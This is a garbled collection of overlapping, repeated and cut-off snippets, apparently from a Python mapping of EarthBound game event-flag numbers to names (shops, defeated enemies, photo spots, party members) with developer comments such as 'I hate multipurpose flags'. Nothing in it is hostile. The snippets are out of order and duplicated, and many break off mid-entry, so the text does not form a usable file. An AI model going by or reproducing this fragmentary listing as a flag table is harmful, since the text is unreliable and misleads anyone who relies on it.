640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644:", "334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', #", "'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED',", "54 (Montague at beginning of expanded mine?) # 55 (Also related to Montague...", "413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419:", "Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?) #", "482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488:", "the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327:", "for this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The", "'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4',", "275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281:", "739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745:", "476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482:", "589 (Visibility flag for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO:", "679 (Something about Venus show about to start?) # 680 (Something about Venus", "'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS',", "'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE',", "'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676:", "'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP',", "Lake Tess color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292:", "'GIVEN_PLAYERS_NAME', # 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545:", "498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504:", "'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility", "'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE',", "124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can search for shyness", "'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS',", "'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???) # 157 (???)", "hate multipurpose flags) # 232 (I hate multipurpose flags) # 233 (I hate", "490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496:", "NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when arriving in", "Maybe \"can search for shyness book\"? This flag is set even if you", "'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197: 'CONQUERED_SANCTUARY_8', # 198 (Unknown. Set", "'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus show about to", "125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can search for shyness book\"? This", "Dad acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326:", "'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679", "636: 'PAULA_TELEPATHY_DREAM_JEFF', 637: 'POO_AT_HIS_PALACE', 638: 'PAULA_AT_HER_ROOM', 639: 'TALKED_TO_MAGICANT_EVERDRED', 640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642:", "'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE',", "Kid calls you about the Gourmet Yogurt Machine) # 377 (???) # 378", "(I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238:", "'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT',", "'NESS_MOM_OUTSIDE', # 475 (Handles continue yes/no on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477:", "504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510:", "143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146:", "Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE',", "743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747 (??? Something about", "unused text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106 (???) 107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED',", "335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???)", "'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE',", "# 611 (Something about talking to Paula's dad and not talking to Everdred)", "'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something about the City Bus?)", "'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED',", "'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54", "661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667:", "'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS',", "# 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP',", "660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666:", "401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407:", "780 (If set, Maxwell doesn't actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829:", "'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE',", "594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598:", "Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472:", "# 144 (Related to Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', #", "245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251:", "'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning of expanded mine?) # 55 (Also related", "760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when arriving in Threed, cleared when defeating", "598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604:", "hate multipurpose flags) # 231 (I hate multipurpose flags) # 232 (I hate", "471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475 (Handles continue yes/no", "305 (???) 306: 'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311:", "(Another flag for Starman DX defeated. One of them might be responsible only", "488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494:", "Guardian doesn't reference this flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The", "(Unknown. Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set", "'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607", "# 163 (???) # 164 (???) 165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168:", "Tess color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED',", "'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70:", "420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT', 426:", "'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?) # 780 (If set, Maxwell", "'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when arriving in Threed, cleared when defeating Belch)", "113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119:", "163 (???) # 164 (???) 165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3',", "604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to desert mine?)", "'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532:", "'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED',", "101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text 104: 'POKEY_PUNISHED',", "547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553:", "29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35:", "TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related", "379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384:", "270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276:", "'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140:", "Runaway Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about the City Bus?)", "'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE',", "'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321 (Something about Paula's Dad acknowledging", "you don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130:", "32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38:", "521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???)", "'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER',", "211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217:", "(0x02A0, 0x0D70) in a radius of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348:", "479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485:", "'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED',", "'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE',", "38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44:", "447 (???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH',", "when arriving in Threed, cleared when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764:", "'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370", "607 (Unknown. Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', #", "for NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC', # 761 (Unknown. Set when arriving", "91: 'GOT_SIGNED_BANANA', 92: 'GOT_TENDA_DRAGONITE', 93: 'GOT_MAGICANT_BASEBALL_CAP', 94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT', 95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97:", "flag for someone in Threed?) # 589 (Visibility flag for some Hotel Attendant?)", "(Unknown. Set when you receive the Pencil Eraser. Cleared when you defeat Mr.", "'LIER_INSIDE_CAVE_3', 307: 'LIER_INSIDE_CAVE_4', 308: 'LIER_BY_MANI_MANI', 309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED',", "room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR',", "'SHOW_TWOSON_HINT_TOWN_MAP', 683: 'SHOW_THREED_HINT_TOWN_MAP', 684: 